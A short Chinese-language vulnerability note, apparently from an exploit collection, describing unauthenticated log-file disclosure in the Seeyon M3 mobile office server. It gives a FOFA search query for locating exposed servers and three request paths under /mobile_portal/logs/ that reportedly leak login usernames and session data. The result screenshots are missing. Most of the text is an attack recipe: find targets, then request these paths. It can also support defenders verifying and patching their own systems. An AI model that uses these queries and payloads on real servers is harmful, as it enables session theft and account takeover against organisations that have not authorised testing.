Z5-4致远互联-M3移动智能办公平台-InformationLeakage

漏洞描述：

致远M3 server多个日志文件存在敏感信息泄露漏洞，允许未经身份验证的远程攻击者访问日志文件，泄露了登陆用户名及session等敏感信息，使系统处于极不安全的状态。

网站图片：

fofa语法：

title=“M3-Server”

漏洞复现：

泄露点-1
payload：

/mobile_portal/logs/autoLogin.log

效果图：

泄露点-2
payload：

/mobile_portal/logs/app.log

效果图：

泄露点-3
payload：

/mobile_portal/logs/requset.log

效果图：